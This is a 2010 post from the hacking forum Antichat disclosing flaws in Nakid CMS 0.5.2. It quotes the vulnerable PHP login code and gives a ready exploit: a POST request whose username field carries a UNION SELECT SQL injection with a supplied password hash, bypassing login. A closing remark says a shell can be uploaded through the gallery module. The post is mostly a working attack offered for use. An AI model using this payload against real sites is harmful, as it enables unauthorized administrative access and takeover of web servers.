20.03.2010, 13:46
|
|
Reservists Of Antichat - Level 6
Регистрация: 22.01.2007
Сообщений: 616
С нами:
10158086
Репутация:
1359
|
|
Nakid CMS 0.5.2
NakidCMS 0.5.2
Обход Авторизации && Blind SQLi
login_process.php
mq=off
PHP код:
$post_username = $_POST['username'];
$post_password = md5($_POST['password']);
$users_query = mysql_query("SELECT id,password FROM ".$system_table_prefix."users WHERE username = '".$post_username."' LIMIT 1") or die("<p class='error'>Error: ".mysql_error()."</p>");
if(mysql_num_rows($users_query)<1){
die("<p class='error'>No such user found</p>");
}
$users_array = mysql_fetch_array($users_query);
if($post_password != $users_array['password']){
die("<p class='error'>Invalid Password</p>");
}
$_SESSION['uid'] = $users_array['id'];
echo("Redirecting to home page, if you are not redirected <a href='index.php'>click here</a>");
redirect_page("index.php?p=home");
Exploit:
Код:
index.php?p=login_process
POST
username=' union select 1 id,'9003d1df22eb4d3820015070385194c8' password#
password=pwd
P.S.
Заливка шелла через модуль галереи.
Последний раз редактировалось geezer.code; 20.03.2010 в 13:49..
|
|
|